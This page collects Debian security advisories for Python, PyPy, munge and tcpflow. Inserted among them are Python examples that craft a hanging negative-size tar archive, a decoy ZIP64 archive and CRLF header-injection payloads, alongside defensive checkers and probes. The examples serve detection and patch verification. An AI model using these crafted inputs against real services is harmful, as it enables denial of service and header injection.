Debian GNU/Linux 9 (Stretch) Extended LTS:
ELA-1641-1 python3.5 security update
Debian GNU/Linux 9 (Stretch) and 10 (Buster) Extended LTS:
ELA-1640-1 python2.7 security update
Debian GNU/Linux 10 (Buster) Extended LTS:
ELA-1642-1 python3.7 security update
ELA-1639-1 pypy security update
Debian GNU/Linux 11 (Bullseye) LTS:
[DLA 4477-1] munge security update
[DLA 4478-1] tcpflow security update
Debian GNU/Linux 12 (Bookworm) and 13 (Trixie):
[DSA 6129-1] munge security update
ELA-1642-1 python3.7 security update
Package : python3.7
Version : 3.7.3-2+deb10u11 (buster)
Related CVEs :
CVE-2025-4516
CVE-2025-6069
CVE-2025-6075
CVE-2025-8194
CVE-2025-8291
CVE-2025-11468
CVE-2025-12084
CVE-2025-13837
CVE-2025-15282
CVE-2026-0672
CVE-2026-1299
Multiple security issues were discovered in Python, an interactive
high-level object-oriented language. They may cause memory corruption,
e-mail and HTTP header injection, validation bypass of .zip archives,
and denial of service (DoS).
CVE-2025-4516
There is a memory-corruption (use-after-free) issue in CPython when
using bytes.decode("unicode_escape", errors="ignore") or errors="replace".
CVE-2025-6069
The html.parser.HTMLParser class had worst-case quadratic
complexity when processing certain crafted malformed inputs,
potentially leading to amplified denial of service.
CVE-2025-6075
If the value passed to os.path.expandvars() is user-controlled, a
performance degradation is possible when expanding environment
variables.
CVE-2025-8194
There is a defect in the CPython “tarfile” module affecting the
“TarFile” extraction and entry enumeration APIs. The tar
implementation would process tar archives with negative offsets
without error, resulting in an infinite loop and deadlock during
the parsing of maliciously crafted tar archives.
CVE-2025-8291
The ‘zipfile’ module did not validate the ZIP64 End of Central
Directory (EOCD) Locator record: the offset value stored in the
locator was not used to find the ZIP64 EOCD record; instead the ZIP64
EOCD record was assumed to be the record immediately preceding the
locator. This could be abused to create ZIP archives that are
interpreted differently by the ‘zipfile’ module than by other ZIP
implementations.
CVE-2025-11468
When folding a long comment in an email header containing
exclusively unfoldable characters, the parenthesis would not be
preserved. This could be used for injecting headers into email
messages where addresses are user-controlled and not sanitized.
CVE-2025-12084
When building nested elements using xml.dom.minidom methods such
as appendChild() that have a dependency on _clear_id_cache() the
algorithm is quadratic. Availability can be impacted when building
excessively nested documents.
CVE-2025-13837
When loading a plist file, the plistlib module read data in a size
specified by the file itself, meaning a malicious file could cause
out-of-memory (OOM) and DoS conditions.
CVE-2025-15282
User-controlled data URLs parsed by urllib.request.DataHandler
allow injecting headers through newlines in the data URL
mediatype.
CVE-2026-0672
When using http.cookies.Morsel, user-controlled cookie values and
parameters could allow injecting HTTP headers into messages. The fix
rejects all control characters within cookie names, values, and
parameters.
CVE-2026-1299
The email module, specifically the “BytesGenerator” class, didn’t
properly quote newlines for email headers when serializing an
email message allowing for header injection when an email is
serialized.
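As an added illustration of the CVE-2025-8194 failure mode (this is example code written for this page, not code from the advisory or from CPython), the following walker builds a one-member tar with tarfile, rewrites the size field of its header to the GNU base-256 value -512 so that header plus "data" comes to zero blocks, and shows a pre-check that refuses negative sizes and non-advancing offsets instead of following them. The member name, its content and all function names are constructed for this example; it runs on Python 3.5 and later.

```python
import io
import tarfile

BLOCK = 512


def decode_number(field):
    """Decode a tar numeric field: NUL/space-terminated octal text, or the GNU
    base-256 form (leading byte 0x80 positive, 0xFF negative two's complement)."""
    if field[0] in (0x80, 0xFF):
        n = int.from_bytes(field[1:], "big")
        if field[0] == 0xFF:
            n -= 256 ** (len(field) - 1)
        return n
    text = field.split(b"\0", 1)[0].strip()
    return int(text or b"0", 8)


def encode_base256(n, width=12):
    """Inverse of decode_number for the base-256 form; used only to craft the sample."""
    if n < 0:
        return b"\xff" + (256 ** (width - 1) + n).to_bytes(width - 1, "big")
    return b"\x80" + n.to_bytes(width - 1, "big")


def fix_checksum(hdr):
    """Recompute the ustar checksum so the crafted header still verifies:
    sum of all header bytes with the 8-byte chksum field read as spaces."""
    total = sum(hdr[:148]) + 8 * 0x20 + sum(hdr[156:])
    hdr[148:156] = b"%06o\0 " % total


def walk_tar(buf, max_members=100000):
    """Enumerate (name, size, header_offset) without trusting the size field.
    A negative size, a non-advancing offset or data past EOF raises ValueError."""
    members = []
    off = 0
    while off + BLOCK <= len(buf):
        hdr = buf[off:off + BLOCK]
        if hdr == b"\0" * BLOCK:            # end-of-archive marker
            break
        name = hdr[0:100].split(b"\0", 1)[0].decode("utf-8", "surrogateescape")
        size = decode_number(hdr[124:136])
        if size < 0:
            raise ValueError("member %r at offset %d has negative size %d" % (name, off, size))
        next_off = off + BLOCK + -(-size // BLOCK) * BLOCK   # data rounded up to blocks
        if next_off <= off:                 # the invariant the hang violated
            raise ValueError("member %r: offset does not advance" % name)
        if next_off > len(buf):
            raise ValueError("member %r: data runs past end of archive" % name)
        members.append((name, size, off))
        if len(members) > max_members:
            raise ValueError("too many members")
        off = next_off
    return members


def check_tar(buf):
    """String verdict for scripting: 'ok (<n> members)' or 'rejected: <reason>'."""
    try:
        return "ok (%d members)" % len(walk_tar(buf))
    except ValueError as exc:
        return "rejected: %s" % exc


def build_archives():
    """Constructed sample: a one-member archive written by tarfile, and a copy
    whose size field is rewritten to -512, so that header + data length is
    zero blocks and a naive reader re-parses the same header forever."""
    bio = io.BytesIO()
    data = b"hello\n"
    with tarfile.open(fileobj=bio, mode="w") as tf:
        info = tarfile.TarInfo("hello.txt")
        info.size = len(data)
        tf.addfile(info, io.BytesIO(data))
    good = bio.getvalue()
    hdr = bytearray(good[:BLOCK])
    hdr[124:136] = encode_base256(-512)
    fix_checksum(hdr)
    return good, bytes(hdr) + good[BLOCK:]


def stdlib_header_verdict(buf):
    """Ask the installed tarfile to parse only the first header (no looping) to
    see whether it accepts the negative size; the answer depends on whether the
    interpreter carries the CVE-2025-8194 fix."""
    try:
        info = tarfile.TarInfo.frombuf(buf[:BLOCK], "utf-8", "surrogateescape")
        return "accepted (size=%d)" % info.size
    except (tarfile.TarError, ValueError) as exc:
        return "rejected (%s)" % type(exc).__name__


if __name__ == "__main__":
    good, bad = build_archives()
    print("good:", check_tar(good), "| stdlib header:", stdlib_header_verdict(good))
    print("bad: ", check_tar(bad), "| stdlib header:", stdlib_header_verdict(bad))
```

Do not hand the crafted archive to tarfile.open() on an unpatched interpreter without a timeout: that is exactly the hang the advisory describes. stdlib_header_verdict() only parses the single header with TarInfo.frombuf and returns immediately, which is enough to tell whether the installed module still accepts a negative size.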
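To make the CVE-2025-8291 discrepancy concrete, the following added example (written for this page, not taken from the advisory or from CPython) hand-assembles a minimal ZIP64 archive in which the locator's offset points at a decoy ZIP64 EOCD record claiming zero entries, while the record physically preceding the locator describes one entry. The audit function reads the record both ways and reports whether they agree, which is the check a scanner should make before trusting either view. The member name, the archive layout and the function names are constructed for this example.

```python
import io
import struct
import zipfile
import zlib

SIG_LOCAL, SIG_CENTRAL = 0x04034B50, 0x02014B50
SIG_EOCD64, SIG_LOCATOR, SIG_EOCD = 0x06064B50, 0x07064B50, 0x06054B50
FMT_EOCD64, FMT_LOCATOR, FMT_EOCD = "<IQHHIIQQQQ", "<IIQI", "<IHHHHIIH"   # 56, 20, 22 bytes


def build_archive(decoy=False):
    """Constructed sample: one stored member plus ZIP64 end records, with the
    classic EOCD fields set to 0xFFFF/0xFFFFFFFF so every reader must consult the
    ZIP64 record.  With decoy=True the locator points at a second ZIP64 EOCD
    record, placed before the central directory, that claims zero entries."""
    name, data = b"hello.txt", b"hello, world\n"
    crc = zlib.crc32(data) & 0xFFFFFFFF
    out = bytearray(struct.pack("<IHHHHHIIIHH", SIG_LOCAL, 20, 0, 0, 0, 0,
                                crc, len(data), len(data), len(name), 0) + name + data)
    decoy_off = len(out)
    if decoy:
        out += struct.pack(FMT_EOCD64, SIG_EOCD64, 44, 45, 45, 0, 0, 0, 0, 0, 0)
    cd_off = len(out)
    out += struct.pack("<IHHHHHHIIIHHHHHII", SIG_CENTRAL, 20, 20, 0, 0, 0, 0, crc,
                       len(data), len(data), len(name), 0, 0, 0, 0, 0, 0) + name
    cd_size = len(out) - cd_off
    eocd64_off = len(out)
    out += struct.pack(FMT_EOCD64, SIG_EOCD64, 44, 45, 45, 0, 0, 1, 1, cd_size, cd_off)
    out += struct.pack(FMT_LOCATOR, SIG_LOCATOR, 0, decoy_off if decoy else eocd64_off, 1)
    out += struct.pack(FMT_EOCD, SIG_EOCD, 0, 0, 0xFFFF, 0xFFFF, 0xFFFFFFFF, 0xFFFFFFFF, 0)
    return bytes(out)


def audit_zip64(buf):
    """Read the ZIP64 EOCD record both ways: via the locator's offset (the spec)
    and as the record physically preceding the locator (what unpatched zipfile
    assumed).  Any disagreement means readers will see different archives."""
    eocd_off = buf.rfind(struct.pack("<I", SIG_EOCD))
    if eocd_off < 0:
        raise ValueError("no end of central directory record")
    rec_size, loc_size = struct.calcsize(FMT_EOCD64), struct.calcsize(FMT_LOCATOR)
    loc_off = eocd_off - loc_size
    if loc_off < 0 or struct.unpack_from("<I", buf, loc_off)[0] != SIG_LOCATOR:
        return {"zip64": False}
    if loc_off < rec_size:
        raise ValueError("locator present but no room for a ZIP64 EOCD record")
    rel_off = struct.unpack_from(FMT_LOCATOR, buf, loc_off)[2]
    if rel_off + rec_size > loc_off or struct.unpack_from("<I", buf, rel_off)[0] != SIG_EOCD64:
        raise ValueError("locator offset %d does not point at a ZIP64 EOCD record" % rel_off)
    by_locator = struct.unpack_from(FMT_EOCD64, buf, rel_off)
    by_position = struct.unpack_from(FMT_EOCD64, buf, loc_off - rec_size)
    view = lambda rec: {"entries": rec[7], "cd_size": rec[8], "cd_offset": rec[9]}
    return {
        "zip64": True,
        "locator_offset": rel_off,
        "previous_record_offset": loc_off - rec_size,
        "by_locator": view(by_locator),
        "by_position": view(by_position),
        "consistent": rel_off == loc_off - rec_size and by_locator == by_position,
    }


def stdlib_namelist(buf):
    """What the installed zipfile reports for the archive.  For the decoy it
    lists hello.txt on an interpreter without the CVE-2025-8291 fix, because
    that code read the record before the locator; a fixed one honours the locator."""
    try:
        with zipfile.ZipFile(io.BytesIO(buf)) as zf:
            return zf.namelist()
    except zipfile.BadZipFile as exc:
        return "rejected (%s)" % exc


if __name__ == "__main__":
    for label, archive in (("well-formed", build_archive()), ("decoy", build_archive(decoy=True))):
        print(label, audit_zip64(archive), stdlib_namelist(archive))
```

A legitimate archive may carry "zip64 extensible data" between the ZIP64 EOCD record and the locator, in which case the two offsets differ even though nothing is wrong; treat a mismatch as a reason to reject or quarantine the file rather than as proof of tampering, and compare the "by_locator" view with whatever tool actually extracts the archive downstream.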
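CVE-2025-15282 and CVE-2026-0672 are both header injection through a newline that the standard library copied into a header block unchanged. The added example below (written for this page, not part of the advisory or of CPython) does two things: it provides an application-side guard that rejects control characters in any user-controlled value before it reaches http.cookies, urllib or the email package, and it probes the installed interpreter with the two vectors so an operator can see whether the fix is present without relying on version strings. The cookie and header names in the payloads are constructed for this example; the probes run offline because the data: scheme never touches the network.

```python
import urllib.request
from http.cookies import CookieError, Morsel

CONTROL_CHARS = frozenset(chr(c) for c in list(range(0x00, 0x20)) + [0x7F])


def is_header_safe(value):
    """True if value contains no CR, LF, NUL or other control character."""
    return not any(ch in CONTROL_CHARS for ch in value)


def require_header_safe(value, what="header value"):
    """Application-side guard to apply to user-controlled text before it is
    handed to http.cookies, urllib or the email package.  Returns value unchanged
    so it can be used inline; raises ValueError otherwise."""
    if not is_header_safe(value):
        raise ValueError("%s contains a control character: %r" % (what, value))
    return value


def _cookie_verdict(make):
    try:
        output = make()
    except CookieError:
        return "rejected"
    return "injected" if "\r\n" in output else "escaped"


def probe_cookie_param():
    """CVE-2026-0672 vector: CRLF smuggled through a Morsel attribute (path)."""
    def make():
        m = Morsel()
        m.set("session", "abc123", "abc123")
        m["path"] = "/\r\nSet-Cookie: admin=1"
        return m.OutputString()
    return _cookie_verdict(make)


def probe_cookie_value():
    """CVE-2026-0672 vector: CRLF in a coded value set directly on a Morsel
    (SimpleCookie's value_encode would octal-escape it; Morsel.set does not)."""
    def make():
        m = Morsel()
        m.set("session", "abc", "abc\r\nSet-Cookie: admin=1")
        return m.OutputString()
    return _cookie_verdict(make)


def probe_data_url():
    """CVE-2025-15282 vector: a newline inside the mediatype of a data: URL is
    copied into the header block that DataHandler builds for the response."""
    url = "data:text/plain\r\nX-Injected: yes;base64,aGVsbG8="
    try:
        with urllib.request.urlopen(url) as resp:     # no network: data: scheme
            headers = resp.info()
    except Exception as exc:
        return "rejected (%s)" % type(exc).__name__
    return "injected" if "X-Injected" in headers else "safe"


def run_probes():
    """Verdict per vector: 'rejected' (fix present), 'escaped'/'safe', or 'injected'."""
    return {"cookie_param": probe_cookie_param(),
            "cookie_value": probe_cookie_value(),
            "data_url": probe_data_url()}


if __name__ == "__main__":
    for vector, verdict in sorted(run_probes().items()):
        print("%-13s %s" % (vector, verdict))
```

The guard is deliberately stricter than the library fixes: it refuses every control character, not only CR and LF, because the same values tend to be reused across HTTP, cookie and e-mail contexts with different parsers. Keep it even on patched interpreters; the probes are there to find the hosts that were missed.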
ELA-1641-1 python3.5 security update
Package : python3.5
Version : 3.5.3-1+deb9u12 (stretch)
Related CVEs :
CVE-2025-6069
CVE-2025-6075
CVE-2025-8194
CVE-2025-8291
CVE-2025-12084
CVE-2025-13837
CVE-2025-15282
CVE-2026-0672
CVE-2026-1299
Multiple security issues were discovered in Python, an interactive
high-level object-oriented language. They may cause e-mail and HTTP
header injection, validation bypass of .zip archives, and denial of
service (DoS).
CVE-2025-6069
The html.parser.HTMLParser class had worst-case quadratic
complexity when processing certain crafted malformed inputs,
potentially leading to amplified denial of service.
CVE-2025-6075
If the value passed to os.path.expandvars() is user-controlled, a
performance degradation is possible when expanding environment
variables.
CVE-2025-8194
There is a defect in the CPython “tarfile” module affecting the
“TarFile” extraction and entry enumeration APIs. The tar
implementation would process tar archives with negative offsets
without error, resulting in an infinite loop and deadlock during
the parsing of maliciously crafted tar archives.
CVE-2025-8291
The ‘zipfile’ module did not validate the ZIP64 End of Central
Directory (EOCD) Locator record: the offset value stored in the
locator was not used to find the ZIP64 EOCD record; instead the ZIP64
EOCD record was assumed to be the record immediately preceding the
locator. This could be abused to create ZIP archives that are
interpreted differently by the ‘zipfile’ module than by other ZIP
implementations.
CVE-2025-12084
When building nested elements using xml.dom.minidom methods such
as appendChild() that have a dependency on _clear_id_cache() the
algorithm is quadratic. Availability can be impacted when building
excessively nested documents.
CVE-2025-13837
When loading a plist file, the plistlib module read data in a size
specified by the file itself, meaning a malicious file could cause
out-of-memory (OOM) and DoS conditions.
CVE-2025-15282
User-controlled data URLs parsed by urllib.request.DataHandler
allow injecting headers through newlines in the data URL
mediatype.
CVE-2026-0672
When using http.cookies.Morsel, user-controlled cookie values and
parameters could allow injecting HTTP headers into messages. The fix
rejects all control characters within cookie names, values, and
parameters.
CVE-2026-1299
The email module, specifically the “BytesGenerator” class, didn’t
properly quote newlines for email headers when serializing an
email message allowing for header injection when an email is
serialized.
ELA-1640-1 python2.7 security update
Package : python2.7
Version : 2.7.13-2+deb9u12 (stretch), 2.7.16-2+deb10u7 (buster)
Related CVEs :
CVE-2025-6069
CVE-2025-6075
CVE-2025-8194
CVE-2025-12084
CVE-2026-0672
Multiple security issues were discovered in Python, an interactive
high-level object-oriented language. They may cause HTTP header
injection and denial of service (DoS).
CVE-2025-6069
The html.parser.HTMLParser class had worst-case quadratic
complexity when processing certain crafted malformed inputs,
potentially leading to amplified denial of service.
CVE-2025-6075
If the value passed to os.path.expandvars() is user-controlled, a
performance degradation is possible when expanding environment
variables.
CVE-2025-8194
There is a defect in the CPython “tarfile” module affecting the
“TarFile” extraction and entry enumeration APIs. The tar
implementation would process tar archives with negative offsets
without error, resulting in an infinite loop and deadlock during
the parsing of maliciously crafted tar archives.
CVE-2025-12084
When building nested elements using xml.dom.minidom methods such
as appendChild() that have a dependency on _clear_id_cache() the
algorithm is quadratic. Availability can be impacted when building
excessively nested documents.
CVE-2026-0672
When using http.cookies.Morsel, user-controlled cookie values and
parameters could allow injecting HTTP headers into messages. The fix
rejects all control characters within cookie names, values, and
parameters.
ELA-1639-1 pypy security update
Package : pypy
Version : 7.0.0+dfsg-3+deb10u3 (buster)
Related CVEs :
CVE-2025-6069
CVE-2025-6075
CVE-2025-8194
CVE-2025-12084
CVE-2026-0672
Multiple vulnerabilities were discovered in PyPy, a fast, compliant
alternative implementation of the Python language.
All fixed vulnerabilities come from the embedded python2.7 standard
library. Please refer to ELA-1640-1 for details.
[SECURITY] [DLA 4477-1] munge security update
- -------------------------------------------------------------------------
Debian LTS Advisory DLA-4477-1 debian-lts@lists.debian.org
https://www.debian.org/lts/security/ Thorsten Alteholz
February 10, 2026 https://wiki.debian.org/LTS
- -------------------------------------------------------------------------
Package : munge
Version : 0.5.14-4+deb11u1
CVE ID : CVE-2026-25506
Titouan Lazard discovered a buffer overflow vulnerability in munge, an
authentication service to create and validate credentials, which may
allow local users to leak the MUNGE cryptographic key and forge
arbitrary credentials.
Additional details can be found in the upstream advisory:
https://github.com/dun/munge/security/advisories/GHSA-r9cr-jf4v-75gh
For Debian 11 bullseye, this problem has been fixed in version
0.5.14-4+deb11u1.
We recommend that you upgrade your munge packages.
For the detailed security status of munge please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/munge
Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DLA 4478-1] tcpflow security update
- -------------------------------------------------------------------------
Debian LTS Advisory DLA-4478-1 debian-lts@lists.debian.org
https://www.debian.org/lts/security/ Paride Legovini
February 10, 2026 https://wiki.debian.org/LTS
- -------------------------------------------------------------------------
Package : tcpflow
Version : 1.5.2+repack1-1+deb11u1
CVE ID : CVE-2026-25061
Debian Bug : #1126695
A bug has been found in the tcpflow package: a wrong length check in the
802.11 management frame parser allows a crafted frame with a large TIM
length to cause an out-of-bounds write, resulting in a DoS and potentially
in code execution.
For Debian 11 bullseye, this problem has been fixed in version
1.5.2+repack1-1+deb11u1.
We recommend that you upgrade your tcpflow packages.
For the detailed security status of tcpflow please refer to
its security tracker page at:
https://security-tracker.debian.org/tracker/tcpflow
Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://wiki.debian.org/LTS
[SECURITY] [DSA 6129-1] munge security update
- -------------------------------------------------------------------------
Debian Security Advisory DSA-6129-1 security@debian.org
https://www.debian.org/security/ Salvatore Bonaccorso
February 10, 2026 https://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : munge
CVE ID : CVE-2026-25506
Titouan Lazard discovered a buffer overflow vulnerability in munge, an
authentication service to create and validate credentials, which may
allow local users to leak the MUNGE cryptographic key and forge
arbitrary credentials.
Additional details can be found in the upstream advisory:
https://github.com/dun/munge/security/advisories/GHSA-r9cr-jf4v-75gh
For the oldstable distribution (bookworm), this problem has been fixed
in version 0.5.15-2+deb12u1.
For the stable distribution (trixie), this problem has been fixed in
version 0.5.16-1.1~deb13u1.
We recommend that you upgrade your munge packages.
For the detailed security status of munge please refer to its security
tracker page at:
https://security-tracker.debian.org/tracker/munge
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/